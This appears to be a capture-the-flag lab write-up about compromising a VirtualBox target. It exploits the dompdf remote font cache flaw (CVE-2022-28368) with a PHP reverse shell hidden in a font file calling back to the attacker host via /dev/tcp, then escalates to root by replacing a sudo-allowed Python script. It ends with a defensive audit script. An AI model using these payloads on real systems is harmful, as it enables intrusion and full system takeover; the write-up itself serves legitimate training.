# Information gathering

## Host discovery

```
┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.21.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:18 EDT
Nmap scan report for 192.168.21.6
Host is up (0.00046s latency).
MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.21.7
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.77 seconds
```

## Port scan

```
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:19 EDT
Nmap scan report for 192.168.21.6
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80/tcp open  http    nginx 1.22.1
MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds
```

# Exploitation

Port 80 serves an HTML-to-PDF converter.

## Directory enumeration

```
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.21.6
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt,jpg,png,zip,git
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 1026]
/upload               (Status: 301) [Size: 169] [--> http://192.168.21.6/upload/]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================
```

I tried file inclusion first, without success. On closer inspection this looks like CVE-2022-28368 (the dompdf remote font cache issue).

Find a `.ttf` font file, copy it to a `.php` file and append a shell to it:

```
┌──(kali㉿kali)-[~]
└─$ find / -name "*.ttf" 2>/dev/null

┌──(kali㉿kali)-[~]
└─$ cp /usr/lib/gophish/static/font/fontawesome-webfont.ttf ./exp.php

┌──(kali㉿kali)-[~]
└─$ echo '<?php system("bash -c \"bash -i >& /dev/tcp/192.168.21.7/4444 0>&1\""); ?>' >> ./exp.php
```

Then create a CSS file that references it as a web font:

```
┌──(kali㉿kali)-[~]
└─$ cat exp.css
@font-face {
    font-family: exp;
    src: url(http://192.168.21.7:8080/exp.php);
    font-weight: normal;
    font-style: normal;
}
```

Then create an HTML file that uses the font, to trigger the download:

```
┌──(kali㉿kali)-[~]
└─$ cat exp.html
<!DOCTYPE html>
<html>
<head>
    <link rel="stylesheet" href="http://192.168.21.7:8080/exp.css">
</head>
<body>
    <div style="font-family: exp;">New Font...</div>
</body>
</html>
```

Start the exploitation by serving the files:

```
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080
```

Submit `http://192.168.21.7:8080/exp.html` to the converter web page. It triggers successfully; the server fetches all three files:

```
192.168.21.6 - - [24/Apr/2026 04:11:08] "GET /exp.html HTTP/1.1" 200 -
192.168.21.6 - - [24/Apr/2026 04:11:08] "GET /exp.css HTTP/1.1" 200 -
192.168.21.6 - - [24/Apr/2026 04:11:08] "GET /exp.php HTTP/1.1" 200 -
```

The cache file name is derived from the font family, style, weight and an MD5 hash of the font URL, in the form `fontfamily_fontstyle_md5hash.php`. Compute the MD5:

```
┌──(kali㉿kali)-[~]
└─$ echo -n "http://192.168.21.7:8080/exp.php" | md5sum
12c572ccb65e130e206986e53354e0af  -
```

The fonts are usually cached under `/vendor/dompdf/dompdf/lib/fonts/`; here the directory is `/dompdf/lib/fonts/`. Request the cached file to trigger it:

```
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.21.6/dompdf/lib/fonts/exp_normal_12c572ccb65e130e206986e53354e0af.php"
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.21.7] from (UNKNOWN) [192.168.21.6] 41868
bash: cannot set terminal process group (484): Inappropriate ioctl for device
bash: no job control in this shell
eva@convert:/var/www/html/dompdf/lib/fonts$ id
id
uid=1000(eva) gid=1000(eva) groups=1000(eva)
```

# Privilege escalation

```
eva@convert:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for eva on convert:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User eva may run the following commands on convert:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *
```

We have write permission in eva's home directory, so the script that sudo runs as root can be swapped out. The original script:

```
eva@convert:/var/www/html$ cat /home/eva/pdfgen.py
cat /home/eva/pdfgen.py
```

```python
from os import path
from time import time
from weasyprint import HTML, CSS
from urllib.parse import urlparse
from argparse import ArgumentParser
from logging import basicConfig, INFO, error, info, exception


def prune_log(log_file, max_size=1):
    try:
        log_size = path.getsize(log_file) / (1024 * 1024)
        if log_size > max_size:
            with open(log_file, 'w'):
                pass
            info(f"Log file pruned. Size exceeded {max_size} MB.")
            print(f"Log file pruned. Size exceeded {max_size} MB.")
    except Exception as e:
        print(f"Error pruning log file: {e}")


log_file = '/home/eva/pdf_gen.log'
prune_log(log_file)
basicConfig(level=INFO, filename=log_file, filemode='a',
            format='%(asctime)s - %(levelname)s - %(message)s')


def is_path_allowed(output_path):
    blocked_directories = ["/root", "/etc"]
    for directory in blocked_directories:
        if output_path.startswith(directory):
            return False
    return True


def url_html_to_pdf(url, output_path):
    block_schemes = ["file", "data"]
    block_hosts = ["127.0.0.1", "localhost"]
    blocked_directories = ["/root", "/etc"]
    try:
        start_time = time()
        scheme = urlparse(url).scheme
        hostname = urlparse(url).hostname
        if scheme in block_schemes:
            error(f"{scheme} scheme is Blocked")
            print(f"Error: {scheme} scheme is Blocked")
            return
        if hostname in block_hosts:
            error(f"{hostname} hostname is Blocked")
            print(f"Error: {hostname} hostname is Blocked")
            return
        if not is_path_allowed(output_path):
            error(f"Output path is not allowed in {blocked_directories} directories")
            print(f"Error: Output path is not allowed in {blocked_directories} directories")
            return
        html = HTML(url.strip())
        html.write_pdf(output_path, stylesheets=[CSS(string='@page { size: A3; margin: 1cm }')])
        end_time = time()
        elapsed_time = end_time - start_time
        info(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")
        print(f"PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds")
    except Exception as e:
        exception(f"Error: {e}")
        print(f"Error: {e}")


if __name__ == "__main__":
    parser = ArgumentParser(description="Convert HTML content from a URL to a PDF file.")
    parser.add_argument("-U", "--url", help="URL of the HTML content to convert", required=True)
    parser.add_argument("-O", "--out", help="Output file path for the generated PDF",
                        default="/home/eva/output.pdf")
    args = parser.parse_args()
    url_html_to_pdf(args.url, args.out)
```

Create a malicious replacement script:

```
eva@convert:/var/www/html$ echo 'import os; os.system("/bin/bash")' > /home/eva/exp.py
echo 'import os; os.system("/bin/bash")' > /home/eva/exp.py
```

Replace the original file with it:

```
eva@convert:/var/www/html$ mv /home/eva/exp.py /home/eva/pdfgen.py
mv /home/eva/exp.py /home/eva/pdfgen.py
```

Run our script as root. The `pwned` argument does nothing; it is only there to satisfy the rule's `*` argument wildcard:

```
eva@convert:/var/www/html$ sudo /usr/bin/python3 /home/eva/pdfgen.py pwned
sudo /usr/bin/python3 /home/eva/pdfgen.py pwned
id
uid=0(root) gid=0(root) groups=0(root)
```
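As an added defender's check (example code, not part of this writeup), the Python below audits the root cause of the escalation above: a sudo rule that runs an interpreter on a script sitting in a directory the granted user can write, so the script can be swapped out as done with `mv`. The rule parser, the interpreter list and the temporary-directory fixture standing in for `/home/eva` are my own assumptions.

```python
import os
import re
import stat
import tempfile
# Command part of a sudoers rule, e.g. "(ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *"
RULE_RE = re.compile(r"\(.*?\)\s*(?:[A-Z]+:\s*)*(\S+)\s+(\S+)")
INTERPRETERS = ("python", "perl", "ruby", "bash", "sh", "node", "php")

def script_from_rule(rule):
    """(interpreter, script) if the rule runs an interpreter on a script file, else None."""
    m = RULE_RE.search(rule)
    if m and os.path.basename(m.group(1)).startswith(INTERPRETERS):
        return m.group(1), m.group(2)
    return None

def writable_by(path, uid, gids):
    """Whether uid (member of groups gids) may write path, judged from its mode bits."""
    st = os.stat(path)
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit_rule(rule, uid, gids):
    """Findings for a rule granted to uid: writable script, or writable parent dir (script replaceable via mv)."""
    parsed = script_from_rule(rule)
    if parsed is None:
        return []
    script, parent = parsed[1], os.path.dirname(parsed[1]) or "."
    findings = []
    if writable_by(script, uid, gids):
        findings.append(f"script writable: {script}")
    if writable_by(parent, uid, gids):
        findings.append(f"directory writable: {parent}")
    return findings

def audit_as_current_user(rule):
    return audit_rule(rule, os.getuid(), os.getgroups())

def build_demo_fixture():
    """Constructed stand-in for /home/eva: a dir owned by the current user holding a read-only pdfgen.py."""
    home = tempfile.mkdtemp(prefix="eva_home_")
    script = os.path.join(home, "pdfgen.py")
    with open(script, "w") as f:
        f.write("print('pdfgen stub')\n")
    os.chmod(script, 0o444)  # the file itself is not writable; the directory is what matters
    return f"(ALL : ALL) NOPASSWD: /usr/bin/python3 {script} *"
```

The fix the audit points at is to keep the script root-owned in a root-owned directory (and to drop the `*` wildcard if the script does not need arguments).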